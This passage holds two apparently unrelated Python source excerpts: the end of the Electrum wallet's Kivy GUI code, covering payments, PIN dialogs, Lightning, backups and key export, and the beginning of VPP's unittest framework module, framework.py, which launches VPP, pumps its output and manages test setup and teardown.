Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
Clock.schedule_once(lambda dt: on_complete(status, msg))
def broadcast(self, tx):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
else:
msg = msg or ''
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def addresses_dialog(self):
from .uix.dialogs.addresses import AddressesDialog
if self._addresses_dialog is None:
self._addresses_dialog = AddressesDialog(self)
self._addresses_dialog.update()
self._addresses_dialog.open()
def fee_dialog(self, label, dt):
from .uix.dialogs.fee_dialog import FeeDialog
def cb():
self.fee_status = self.electrum_config.get_fee_status()
fee_dialog = FeeDialog(self, self.electrum_config, cb)
fee_dialog.open()
def on_fee(self, event, *arg):
self.fee_status = self.electrum_config.get_fee_status()
def protected(self, msg, f, args):
if self.electrum_config.get('pin_code'):
msg += "\n" + _("Enter your PIN code to proceed")
on_success = lambda pw: f(*args, self.password)
d = PincodeDialog(
self,
message = msg,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=lambda: None)
d.open()
else:
d = Question(
msg,
lambda b: f(*args, self.password) if b else None,
yes_str=_("OK"),
no_str=_("Cancel"),
title=_("Confirm action"))
d.open()
def toggle_lightning(self):
if self.wallet.has_lightning():
if not bool(self.wallet.lnworker.channels):
warning = _('This will delete your lightning private keys')
d = Question(_('Disable Lightning?') + '\n\n' + warning, self._disable_lightning)
d.open()
else:
self.show_info('This wallet has channels')
else:
warning1 = _("Lightning support in Electrum is experimental. Do not put large amounts in lightning channels.")
warning2 = _("Funds stored in lightning channels are not recoverable from your seed. You must backup your wallet file everytime you create a new channel.")
d = Question(_('Enable Lightning?') + '\n\n' + warning1 + '\n\n' + warning2, self._enable_lightning)
d.open()
def _enable_lightning(self, b):
if not b:
return
wallet_path = self.get_wallet_path()
self.wallet.init_lightning()
self.show_info(_('Lightning keys have been initialized.'))
self.stop_wallet()
self.load_wallet_by_name(wallet_path)
def _disable_lightning(self, b):
if not b:
return
wallet_path = self.get_wallet_path()
self.wallet.remove_lightning()
self.show_info(_('Lightning keys have been removed.'))
self.stop_wallet()
self.load_wallet_by_name(wallet_path)
def delete_wallet(self):
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Are you sure you want to delete wallet {}?").format(basename),
self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
new_path = self.electrum_config.get_wallet_path(use_gui_last_wallet=True)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Display your seed?"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
label.data = seed
if passphrase:
label.data += '\n\n' + _('Passphrase') + ': ' + passphrase
def has_pin_code(self):
return bool(self.electrum_config.get('pin_code'))
def check_pin_code(self, pin):
if pin != self.electrum_config.get('pin_code'):
raise InvalidPassword
def change_password(self, cb):
def on_success(old_password, new_password):
self.wallet.update_password(old_password, new_password)
self.password = new_password
self.show_info(_("Your password was updated"))
on_failure = lambda: self.show_error(_("Password not updated"))
d = ChangePasswordDialog(self, self.wallet, on_success, on_failure)
d.open()
def change_pin_code(self, cb):
def on_success(old_password, new_password):
self.electrum_config.set_key('pin_code', new_password)
cb()
self.show_info(_("PIN updated") if new_password else _('PIN disabled'))
on_failure = lambda: self.show_error(_("PIN not updated"))
d = PincodeDialog(
self,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=on_failure,
is_change=True,
has_password = self.has_pin_code())
d.open()
def save_backup(self):
if platform != 'android':
self._save_backup()
return
from android.permissions import request_permissions, Permission
def cb(permissions, grant_results: Sequence[bool]):
if not grant_results or not grant_results[0]:
self.show_error(_("Cannot save backup without STORAGE permission"))
return
# note: Clock.schedule_once is a hack so that we get called on a non-daemon thread
# (needed for WalletDB.write)
Clock.schedule_once(lambda dt: self._save_backup())
request_permissions([Permission.WRITE_EXTERNAL_STORAGE], cb)
def _save_backup(self):
new_path = self.wallet.save_backup()
if new_path:
self.show_info(_("Backup saved:") + f"\n{new_path}")
else:
self.show_error(_("Backup NOT saved. Backup directory not configured."))
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password))
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Decrypt your private key?"), show_private_key, (addr, pk_label))
def import_channel_backup(self, encrypted):
d = Question(_('Import Channel Backup?'), lambda b: self._import_channel_backup(b, encrypted))
d.open()
def _import_channel_backup(self, b, encrypted):
if not b:
return
try:
self.wallet.lnbackups.import_channel_backup(encrypted)
except Exception as e:
self.show_error("failed to import backup" + '\n' + str(e))
return
self.lightning_channels_dialog()
|
framework.py
|
#!/usr/bin/env python3
from __future__ import print_function
import gc
import logging
import sys
import os
import select
import signal
import subprocess
import unittest
import tempfile
import time
import faulthandler
import random
import copy
import psutil
import platform
from collections import deque
from threading import Thread, Event
from inspect import getdoc, isclass
from traceback import format_exception
from logging import FileHandler, DEBUG, Formatter
import scapy.compat
from scapy.packet import Raw
import hook as hookmodule
from vpp_pg_interface import VppPGInterface
from vpp_sub_interface import VppSubInterface
from vpp_lo_interface import VppLoInterface
from vpp_bvi_interface import VppBviInterface
from vpp_papi_provider import VppPapiProvider
import vpp_papi
from vpp_papi.vpp_stats import VPPStats
from vpp_papi.vpp_transport_shmem import VppTransportShmemIOError
from log import RED, GREEN, YELLOW, double_line_delim, single_line_delim, \
get_logger, colorize
from vpp_object import VppObjectRegistry
from util import ppp, is_core_present
from scapy.layers.inet import IPerror, TCPerror, UDPerror, ICMPerror
from scapy.layers.inet6 import ICMPv6DestUnreach, ICMPv6EchoRequest
from scapy.layers.inet6 import ICMPv6EchoReply
logger = logging.getLogger(__name__)
# Set up an empty logger for the testcase that can be overridden as necessary
null_logger = logging.getLogger('VppTestCase')
null_logger.addHandler(logging.NullHandler())
PASS = 0
FAIL = 1
ERROR = 2
SKIP = 3
TEST_RUN = 4
class BoolEnvironmentVariable(object):
def __init__(self, env_var_name, default='n', true_values=None):
self.name = env_var_name
self.default = default
self.true_values = true_values if true_values is not None else \
("y", "yes", "1")
def __bool__(self):
return os.getenv(self.name, self.default).lower() in self.true_values
if sys.version_info[0] == 2:
__nonzero__ = __bool__
def __repr__(self):
return 'BoolEnvironmentVariable(%r, default=%r, true_values=%r)' % \
(self.name, self.default, self.true_values)
debug_framework = BoolEnvironmentVariable('TEST_DEBUG')
if debug_framework:
import debug_internal
"""
Test framework module.
The module provides a set of tools for constructing and running tests and
representing the results.
"""
class VppDiedError(Exception):
""" exception for reporting that the subprocess has died."""
signals_by_value = {v: k for k, v in signal.__dict__.items() if
k.startswith('SIG') and not k.startswith('SIG_')}
def __init__(self, rv=None, testcase=None, method_name=None):
self.rv = rv
self.signal_name = None
self.testcase = testcase
self.method_name = method_name
try:
self.signal_name = VppDiedError.signals_by_value[-rv]
except (KeyError, TypeError):
pass
if testcase is None and method_name is None:
in_msg = ''
else:
in_msg = 'running %s.%s ' % (testcase, method_name)
msg = "VPP subprocess died %sunexpectedly with return code: %d%s." % (
in_msg,
self.rv,
' [%s]' % (self.signal_name if
self.signal_name is not None else ''))
super(VppDiedError, self).__init__(msg)
class _PacketInfo(object):
"""Private class to create packet info object.
Help process information about the next packet.
Set variables to default values.
"""
#: Store the index of the packet.
index = -1
#: Store the index of the source packet generator interface of the packet.
src = -1
#: Store the index of the destination packet generator interface
#: of the packet.
dst = -1
#: Store expected ip version
ip = -1
#: Store expected upper protocol
proto = -1
#: Store the copy of the former packet.
data = None
def __eq__(self, other):
index = self.index == other.index
src = self.src == other.src
dst = self.dst == other.dst
data = self.data == other.data
return index and src and dst and data
def pump_output(testclass):
""" pump output from vpp stdout/stderr to proper queues """
stdout_fragment = ""
stderr_fragment = ""
while not testclass.pump_thread_stop_flag.is_set():
readable = select.select([testclass.vpp.stdout.fileno(),
testclass.vpp.stderr.fileno(),
testclass.pump_thread_wakeup_pipe[0]],
[], [])[0]
if testclass.vpp.stdout.fileno() in readable:
read = os.read(testclass.vpp.stdout.fileno(), 102400)
if len(read) > 0:
split = read.decode('ascii',
errors='backslashreplace').splitlines(True)
if len(stdout_fragment) > 0:
split[0] = "%s%s" % (stdout_fragment, split[0])
if len(split) > 0 and split[-1].endswith("\n"):
limit = None
else:
limit = -1
stdout_fragment = split[-1]
testclass.vpp_stdout_deque.extend(split[:limit])
if not testclass.cache_vpp_output:
for line in split[:limit]:
testclass.logger.info(
"VPP STDOUT: %s" % line.rstrip("\n"))
if testclass.vpp.stderr.fileno() in readable:
read = os.read(testclass.vpp.stderr.fileno(), 102400)
if len(read) > 0:
split = read.decode('ascii',
errors='backslashreplace').splitlines(True)
if len(stderr_fragment) > 0:
split[0] = "%s%s" % (stderr_fragment, split[0])
if len(split) > 0 and split[-1].endswith("\n"):
limit = None
else:
limit = -1
stderr_fragment = split[-1]
testclass.vpp_stderr_deque.extend(split[:limit])
if not testclass.cache_vpp_output:
for line in split[:limit]:
testclass.logger.error(
"VPP STDERR: %s" % line.rstrip("\n"))
# ignoring the dummy pipe here intentionally - the
# flag will take care of properly terminating the loop
def _is_skip_aarch64_set():
return BoolEnvironmentVariable('SKIP_AARCH64')
is_skip_aarch64_set = _is_skip_aarch64_set()
def _is_platform_aarch64():
return platform.machine() == 'aarch64'
is_platform_aarch64 = _is_platform_aarch64()
def _running_extended_tests():
return BoolEnvironmentVariable("EXTENDED_TESTS")
running_extended_tests = _running_extended_tests()
def _running_gcov_tests():
return BoolEnvironmentVariable("GCOV_TESTS")
running_gcov_tests = _running_gcov_tests()
class KeepAliveReporter(object):
"""
Singleton object which reports test start to parent process
"""
_shared_state = {}
def __init__(self):
self.__dict__ = self._shared_state
self._pipe = None
@property
def pipe(self):
return self._pipe
@pipe.setter
def pipe(self, pipe):
if self._pipe is not None:
raise Exception("Internal error - pipe should only be set once.")
self._pipe = pipe
def send_keep_alive(self, test, desc=None):
"""
Write current test tmpdir & desc to keep-alive pipe to signal liveness
"""
if self.pipe is None:
# if not running forked..
return
if isclass(test):
desc = '%s (%s)' % (desc, unittest.util.strclass(test))
else:
desc = test.id()
self.pipe.send((desc, test.vpp_bin, test.tempdir, test.vpp.pid))
class VppTestCase(unittest.TestCase):
"""This subclass is a base class for VPP test cases that are implemented as
classes. It provides methods to create and run test case.
"""
extra_vpp_punt_config = []
extra_vpp_plugin_config = []
logger = null_logger
vapi_response_timeout = 5
@property
def packet_infos(self):
"""List of packet infos"""
return self._packet_infos
@classmethod
def get_packet_count_for_if_idx(cls, dst_if_index):
"""Get the number of packet info for specified destination if index"""
if dst_if_index in cls._packet_count_for_dst_if_idx:
return cls._packet_count_for_dst_if_idx[dst_if_index]
else:
return 0
@classmethod
def force_solo(cls):
""" if the test case class is timing-sensitive - return true """
return False
@classmethod
def instance(cls):
"""Return the instance of this testcase"""
return cls.test_instance
@classmethod
def set_debug_flags(cls, d):
cls.gdbserver_port = 7777
cls.debug_core = False
cls.debug_gdb = False
cls.debug_gdbserver = False
cls.debug_all = False
if d is None:
return
dl = d.lower()
if dl == "core":
cls.debug_core = True
elif dl == "gdb" or dl == "gdb-all":
cls.debug_gdb = True
elif dl == "gdbserver" or dl == "gdbserver-all":
cls.debug_gdbserver = True
else:
raise Exception("Unrecognized DEBUG option: '%s'" % d)
if dl == "gdb-all" or dl == "gdbserver-all":
cls.debug_all = True
@staticmethod
def get_least_used_cpu():
cpu_usage_list = [set(range(psutil.cpu_count()))]
vpp_processes = [p for p in psutil.process_iter(attrs=['pid', 'name'])
if 'vpp_main' == p.info['name']]
for vpp_process in vpp_processes:
for cpu_usage_set in cpu_usage_list:
try:
cpu_num = vpp_process.cpu_num()
if cpu_num in cpu_usage_set:
cpu_usage_set_index = cpu_usage_list.index(
cpu_usage_set)
if cpu_usage_set_index == len(cpu_usage_list) - 1:
cpu_usage_list.append({cpu_num})
else:
cpu_usage_list[cpu_usage_set_index + 1].add(
cpu_num)
cpu_usage_set.remove(cpu_num)
break
except psutil.NoSuchProcess:
pass
for cpu_usage_set in cpu_usage_list:
if len(cpu_usage_set) > 0:
min_usage_set = cpu_usage_set
break
return random.choice(tuple(min_usage_set))
@classmethod
def setUpConstants(cls):
""" Set-up the test case class based on environment variables """
cls.step = BoolEnvironmentVariable('STEP')
d = os.getenv("DEBUG", None)
# inverted case to handle '' == True
c = os.getenv("CACHE_OUTPUT", "1")
cls.cache_vpp_output = False if c.lower() in ("n", "no", "0") else True
cls.set_debug_flags(d)
cls.vpp_bin = os.getenv('VPP_BIN', "vpp")
cls.plugin_path = os.getenv('VPP_PLUGIN_PATH')
cls.test_plugin_path = os.getenv('VPP_TEST_PLUGIN_PATH')
cls.extern_plugin_path = os.getenv('EXTERN_PLUGINS')
plugin_path = None
if cls.plugin_path is not None:
if cls.extern_plugin_path is not None:
plugin_path = "%s:%s" % (
cls.plugin_path, cls.extern_plugin_path)
else:
plugin_path = cls.plugin_path
elif cls.extern_plugin_path is not None:
plugin_path = cls.extern_plugin_path
debug_cli = ""
if cls.step or cls.debug_gdb or cls.debug_gdbserver:
debug_cli = "cli-listen localhost:5002"
coredump_size = None
size = os.getenv("COREDUMP_SIZE")
if size is not None:
coredump_size = "coredump-size %s" % size
if coredump_size is None:
coredump_size = "coredump-size unlimited"
cpu_core_number = cls.get_least_used_cpu()
if not hasattr(cls, "worker_config"):
cls.worker_config = ""
default_variant = os.getenv("VARIANT")
if default_variant is not None:
default_variant = "defaults { %s 100 }" % default_variant
else:
default_variant = ""
api_fuzzing = os.getenv("API_FUZZ")
if api_fuzzing is None:
api_fuzzing = 'off'
cls.vpp_cmdline = [cls.vpp_bin, "unix",
"{", "nodaemon", debug_cli, "full-coredump",
coredump_size, "runtime-dir", cls.tempdir, "}",
"api-trace", "{", "on", "}", "api-segment", "{",
"prefix", cls.shm_prefix, "}", "cpu", "{",
"main-core", str(cpu_core_number),
cls.worker_config, "}",
"physmem", "{", "max-size", "32m", "}",
"statseg", "{", "socket-name", cls.stats_sock, "}",
"socksvr", "{", "socket-name", cls.api_sock, "}",
"node { ", default_variant, "}",
"api-fuzz {", api_fuzzing, "}",
"plugins",
"{", "plugin", "dpdk_plugin.so", "{", "disable",
"}", "plugin", "rdma_plugin.so", "{", "disable",
"}", "plugin", "lisp_unittest_plugin.so", "{",
"enable",
"}", "plugin", "unittest_plugin.so", "{", "enable",
"}"] + cls.extra_vpp_plugin_config + ["}", ]
if cls.extra_vpp_punt_config is not None:
cls.vpp_cmdline.extend(cls.extra_vpp_punt_config)
if plugin_path is not None:
cls.vpp_cmdline.extend(["plugin_path", plugin_path])
if cls.test_plugin_path is not None:
cls.vpp_cmdline.extend(["test_plugin_path", cls.test_plugin_path])
cls.logger.info("vpp_cmdline args: %s" % cls.vpp_cmdline)
cls.logger.info("vpp_cmdline: %s" % " ".join(cls.vpp_cmdline))
@classmethod
def wait_for_enter(cls):
if cls.debug_gdbserver:
print(double_line_delim)
print("Spawned GDB server with PID: %d" % cls.vpp.pid)
elif cls.debug_gdb:
print(double_line_delim)
print("Spawned VPP with PID: %d" % cls.vpp.pid)
else:
cls.logger.debug("Spawned VPP with PID: %d" % cls.vpp.pid)
return
print(single_line_delim)
print("You can debug VPP using:")
if cls.debug_gdbserver:
print("sudo gdb " + cls.vpp_bin +
" -ex 'target remote localhost:{port}'"
.format(port=cls.gdbserver_port))
print("Now is the time to attach gdb by running the above "
"command, set up breakpoints etc., then resume VPP from "
"within gdb by issuing the 'continue' command")
cls.gdbserver_port += 1
elif cls.debug_gdb:
print("sudo gdb " + cls.vpp_bin + " -ex 'attach %s'" % cls.vpp.pid)
print("Now is the time to attach gdb by running the above "
"command and set up breakpoints etc., then resume VPP from"
" within gdb by issuing the 'continue' command")
print(single_line_delim)
input("Press ENTER to continue running the testcase...")
@classmethod
def run_vpp(cls):
cmdline = cls.vpp_cmdline
if cls.debug_gdbserver:
gdbserver = '/usr/bin/gdbserver'
if not os.path.isfile(gdbserver) or \
not os.access(gdbserver, os.X_OK):
raise Exception("gdbserver binary '%s' does not exist or is "
"not executable" % gdbserver)
cmdline = [gdbserver, 'localhost:{port}'
.format(port=cls.gdbserver_port)] + cls.vpp_cmdline
cls.logger.info("Gdbserver cmdline is %s", " ".join(cmdline))
try:
cls.vpp = subprocess.Popen(cmdline,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
except subprocess.CalledProcessError as e:
cls.logger.critical("Subprocess returned with non-0 return code: ("
"%s)", e.returncode)
raise
except OSError as e:
cls.logger.critical("Subprocess returned with OS error: "
"(%s) %s", e.errno, e.strerror)
raise
except Exception as e:
cls.logger.exception("Subprocess returned unexpected from "
"%s:", cmdline)
raise
cls.wait_for_enter()
@classmethod
def wait_for_coredump(cls):
corefile = cls.tempdir + "/core"
if os.path.isfile(corefile):
cls.logger.error("Waiting for coredump to complete: %s", corefile)
curr_size = os.path.getsize(corefile)
deadline = time.time() + 60
ok = False
while time.time() < deadline:
cls.sleep(1)
size = curr_size
curr_size = os.path.getsize(corefile)
if size == curr_size:
ok = True
break
if not ok:
cls.logger.error("Timed out waiting for coredump to complete:"
" %s", corefile)
else:
cls.logger.error("Coredump complete: %s, size %d",
corefile, curr_size)
@classmethod
def setUpClass(cls):
"""
Perform class setup before running the testcase
Remove shared memory files, start vpp and connect the vpp-api
"""
super(VppTestCase, cls).setUpClass()
gc.collect() # run garbage collection first
cls.logger = get_logger(cls.__name__)
seed = os.environ["RND_SEED"]
random.seed(seed)
if hasattr(cls, 'parallel_handler'):
cls.logger.addHandler(cls.parallel_handler)
cls.logger.propagate = False
cls.tempdir = tempfile.mkdtemp(
prefix='vpp-unittest-%s-' % cls.__name__)
cls.stats_sock = "%s/stats.sock" % cls.tempdir
cls.api_sock = "%s/api.sock" % cls.tempdir
cls.file_handler = FileHandler("%s/log.txt" % cls.tempdir)
cls.file_handler.setFormatter(
Formatter(fmt='%(asctime)s,%(msecs)03d %(message)s',
datefmt="%H:%M:%S"))
cls.file_handler.setLevel(DEBUG)
cls.logger.addHandler(cls.file_handler)
cls.logger.debug("--- setUpClass() for %s called ---" %
cls.__name__)
cls.shm_prefix = os.path.basename(cls.tempdir)
os.chdir(cls.tempdir)
cls.logger.info("Temporary dir is %s, shm prefix is %s",
cls.tempdir, cls.shm_prefix)
cls.logger.debug("Random seed is %s" % seed)
cls.setUpConstants()
cls.reset_packet_infos()
cls._captures = []
cls.verbose = 0
cls.vpp_dead = False
cls.registry = VppObjectRegistry()
cls.vpp_startup_failed = False
cls.reporter = KeepAliveReporter()
# need to catch exceptions here because if we raise, then the cleanup
# doesn't get called and we might end with a zombie vpp
try:
cls.run_vpp()
cls.reporter.send_keep_alive(cls, 'setUpClass')
VppTestResult.current_test_case_info = TestCaseInfo(
cls.logger, cls.tempdir, cls.vpp.pid, cls.vpp_bin)
cls.vpp_stdout_deque = deque()
cls.vpp_stderr_deque = deque()
cls.pump_thread_stop_flag = Event()
cls.pump_thread_wakeup_pipe = os.pipe()
cls.pump_thread = Thread(target=pump_output, args=(cls,))
cls.pump_thread.daemon = True
cls.pump_thread.start()
if cls.debug_gdb or cls.debug_gdbserver:
cls.vapi_response_timeout = 0
cls.vapi = VppPapiProvider(cls.shm_prefix, cls.shm_prefix, cls,
cls.vapi_response_timeout)
if cls.step:
hook = hookmodule.StepHook(cls)
else:
hook = hookmodule.PollHook(cls)
cls.vapi.register_hook(hook)
cls.statistics = VPPStats(socketname=cls.stats_sock)
try:
hook.poll_vpp()
except VppDiedError:
cls.vpp_startup_failed = True
cls.logger.critical(
"VPP died shortly after startup, check the"
" output to standard error for possible cause")
raise
try:
cls.vapi.connect()
except vpp_papi.VPPIOError as e:
cls.logger.debug("Exception connecting to vapi: %s" % e)
cls.vapi.disconnect()
if cls.debug_gdbserver:
print(colorize("You're running VPP inside gdbserver but "
"VPP-API connection failed, did you forget "
"to 'continue' VPP from within gdb?", RED))
raise
except vpp_papi.VPPRuntimeError as e:
cls.logger.debug("%s" % e)
cls.quit()
raise
except Exception as e:
cls.logger.debug("Exception connecting to VPP: %s" % e)
cls.quit()
raise
@classmethod
def _debug_quit(cls):
if (cls.debug_gdbserver or cls.debug_gdb):
try:
cls.vpp.poll()
if cls.vpp.returncode is None:
print()
print(double_line_delim)
print("VPP or GDB server is still running")
print(single_line_delim)
input("When done debugging, press ENTER to kill the "
"process and finish running the testcase...")
except AttributeError:
pass
@classmethod
def quit(cls):
"""
Disconnect vpp-api, kill vpp and cleanup shared memory files
"""
cls._debug_quit()
# first signal that we want to stop the pump thread, then wake it up
if hasattr(cls, 'pump_thread_stop_flag'):
cls.pump_thread_stop_flag.set()
if hasattr(cls, 'pump_thread_wakeup_pipe'):
os.write(cls.pump_thread_wakeup_pipe[1], b'ding dong wake up')
if hasattr(cls, 'pump_thread'):
cls.logger.debug("Waiting for pump thread to stop")
cls.pump_thread.join()
if hasattr(cls, 'vpp_stderr_reader_thread'):
cls.logger.debug("Waiting for stderr pump to stop")
cls.vpp_stderr_reader_thread.join()
if hasattr(cls, 'vpp'):
if hasattr(cls, 'vapi'):
cls.logger.debug(cls.vapi.vpp.get_stats())
cls.logger.debug("Disconnecting class vapi client on %s",
cls.__name__)
cls.vapi.disconnect()
cls.logger.debug("Deleting class vapi attribute on %s",
cls.__name__)
del cls.vapi
cls.vpp.poll()
if cls.vpp.returncode is None:
cls.wait_for_coredump()
cls.logger.debug("Sending TERM to vpp")
cls.vpp.terminate()
cls.logger.debug("Waiting for vpp to die")
cls.vpp.communicate()
cls.logger.debug("Deleting class vpp attribute on %s",
cls.__name__)
del cls.vpp
if cls.vpp_startup_failed:
stdout_log = cls.logger.info
stderr_log = cls.logger.critical
else:
stdout_log = cls.logger.info
stderr_log = cls.logger.info
if hasattr(cls, 'vpp_stdout_deque'):
stdout_log(single_line_delim)
stdout_log('VPP output to stdout while running %s:', cls.__name__)
stdout_log(single_line_delim)
vpp_output = "".join(cls.vpp_stdout_deque)
with open(cls.tempdir + '/vpp_stdout.txt', 'w') as f:
f.write(vpp_output)
stdout_log('\n%s', vpp_output)
stdout_log(single_line_delim)
if hasattr(cls, 'vpp_stderr_deque'):
stderr_log(single_line_delim)
stderr_log('VPP output to stderr while running %s:', cls.__name__)
stderr_log(single_line_delim)
vpp_output = "".join(cls.vpp_stderr_deque)
with open(cls.tempdir + '/vpp_stderr.txt', 'w') as f:
f.write(vpp_output)
stderr_log('\n%s', vpp_output)
stderr_log(single_line_delim)
@classmethod
def tearDownClass(cls):
""" Perform final cleanup after running all tests in this test-case """
cls.logger.debug("--- tearDownClass() for %s called ---" %
cls.__name__)
cls.reporter.send_keep_alive(cls, 'tearDownClass')
cls.quit()
cls.file_handler.close()
cls.reset_packet_infos()
if debug_framework:
debug_internal.on_tear_down_class(cls)
def show_commands_at_teardown(self):
""" Allow subclass specific teardown logging additions."""
self.logger.info("--- No test specific show commands provided. ---")
def tearDown(self):
""" Show various debug prints after each test """
self.logger.debug("--- tearDown() for %s.%s(%s) called ---" %
(self.__class__.__name__, self._testMethodName,
self._testMethodDoc))
try:
if not self.vpp_dead:
self.logger.debug(self.vapi.cli("show trace max 1000"))
self.logger.info(self.vapi.ppcli("show interface"))
self.logger.info(self.vapi.ppcli("show hardware"))
self.logger.info(self.statistics.set_errors_str())
self.logger.info(self.vapi.ppcli("show run"))
self.logger.info(self.vapi.ppcli("show log"))
self.logger.info(self.vapi.ppcli("show bihash"))
self.logger.info("Logging testcase specific show commands.")
self.show_commands_at_teardown()
self.registry.remove_vpp_config(self.logger)
# Save/Dump VPP api trace log
m = self._testMethodName
api_trace = "vpp_api_trace.%s.%d.log" % (m, self.vpp.pid)
tmp_api_trace = "/tmp/%s" % api_trace
vpp_api_trace_log = "%s/%s" % (self.tempdir, api_trace)
self.logger.info(self.vapi.ppcli("api trace save %s" % api_trace))
self.logger.info("Moving %s to %s\n" % (tmp_api_trace,
vpp_api_trace_log))
os.rename(tmp_api_trace, vpp_api_trace_log)
self.logger.info(self.vapi.ppcli("api trace custom-dump %s" %
vpp_api_trace_log))
except VppTransportShmemIOError:
self.logger.debug("VppTransportShmemIOError: Vpp dead. "
"Cannot log show commands.")
self.vpp_dead = True
else:
self.registry.unregister_all(self.logger)
def setUp(self):
""" Clear trace before running each test"""
super(VppTestCase, self).setUp()
self.reporter.send_keep_alive(self)
if self.vpp_dead:
raise VppDiedError(rv=None, testcase=self.__class__.__name__,
method_name=self._testMethodName)
self.sleep(.1, "during setUp")
self.vpp_stdout_deque.append(
"--- test setUp() for %s.%s(%s) starts here ---\n" %
(self.__class__.__name__, self._testMethodName,
self._testMethodDoc))
self.vpp_stderr_deque.append(
"--- test setUp() for %s.%s(%s) starts here ---\n" %
(self.__class__.__name__, self._testMethodName,
self._testMethodDoc))
self.vapi.cli("clear trace")
# store the test instance inside the test class - so that objects
# holding the class can access instance methods (like assertEqual)
type(self).test_instance = self
@classmethod
def pg_enable_capture(cls, interfaces=None):
"""
Enable capture on packet-generator interfaces
:param interfaces: iterable interface indexes (if None,
use self.pg_interfaces)
"""
if interfaces is None:
interfaces = cls.pg_interfaces
for i in interfaces:
i.enable_capture()
@classmethod
def register_capture(cls, cap_name):
""" Register a capture in the testclass """
# add to the list of captures with current timestamp
cls._captures.append((time.time(), cap_name))
@classmethod
def get_vpp_time(cls):
# processes e.g. "Time now 2.190522, Wed, 11 Mar 2020 17:29:54 GMT"
# returns float("2.190522")
timestr = cls.vapi.cli('show clock')
head, sep, tail = timestr.partition(',')
head, sep, tail = head.partition('Time now')
return float(tail)
@classmethod
def sleep_on_vpp_time(cls, sec):
""" Sleep according to time in VPP world """
# On a busy system with many processes
# we might end up with VPP time being slower than real world
# So take that into account when waiting for VPP to do something
start_time = cls.get_vpp_time()
while cls.get_vpp_time() - start_time < sec:
cls.sleep(0.1)
@classmethod
def pg_start(cls):
""" Enable the PG, wait till it is done, then clean up """
cls.vapi.cli("trace add pg-input 1000")
cls.vapi.cli('packet-generator enable')
# PG, when starts, runs to completion -
# so let's avoid a race condition,
# and wait a little till it's done.
# Then clean it up - and then be gone.
deadline = time.time() + 300
while cls.vapi.cli('show packet-generator').find("Yes") != -1:
cls.sleep(0.01) # yield
if time.time() > deadline:
cls.logger.error("Timeout waiting for pg to stop")
break
for stamp, cap_name in cls._captures:
cls.vapi.cli('packet-generator delete %s' % cap_name)
cls._captures = []
@classmethod
def create_pg_interfaces(cls, interfaces, gso=0, gso_size=0):
"""
Create packet-generator interfaces.
:param interfaces: iterable indexes of the interfaces.
:returns: List of created interfaces.
"""
result = []
for i in interfaces:
intf = VppPGInterface(cls, i, gso, gso_size)
setattr(cls, intf.name, intf)
result.append(intf)
cls.pg_interfaces = result
return result
@classmethod
def create_loopback_interfaces(cls, count):
"""
Create loopback interfaces.
:param count: number of interfaces created.
:returns: List of created interfaces.
"""
result = [VppLoInterface(cls) for i in range(count)]
for intf in result:
setattr(cls, intf.name, intf)
cls.lo_interfaces = result
return result
@classmethod
def create_bvi_interfaces(cls, count):
"""
Create BVI interfaces.
:param count: number of interfaces created.
:returns: List of created interfaces.
"""
result = [VppBviInterface(cls) for i in range(count)]
for intf in result:
setattr(cls, intf.name, intf)
cls.bvi_interfaces = result
return result
@staticmethod
def extend_packet(packet, size, padding=' '):
"""
Extend packet to given size by padding with spaces or custom padding
NOTE: Currently works only when Raw layer is present.
:param packet: packet
:param size: target size
:param padding: padding used to extend the payload
"""
packet_len = len(packet) + 4
extend = size - packet_len
if extend > 0:
num = (extend // len(padding)) + 1
packet[Raw].load += (padding * num)[:extend].encode("ascii")
@classmethod
def reset_packet_infos(cls):
""" Reset the list of packet info objects and packet counts to zero """
cls._packet_infos = {}
cls._packet_count_for_dst_if_idx = {}
@classmethod
def create_packet_info(cls, src_if, dst_if):
"""
Create packet info object containing the source and destination indexes
and add it to the testcase's packet info list
:param VppInterface src_if: source interface
:param VppInterface dst_if: destination interface
:returns: _PacketInfo object
"""
info = _PacketInfo()
info.index = len(cls._packet_infos)
info.src = src_if.sw_if_index
info.dst = dst_if.sw_if_index
if isinstance(dst_if, VppSubInterface):
dst_idx = dst_if.parent.sw_if_index
else:
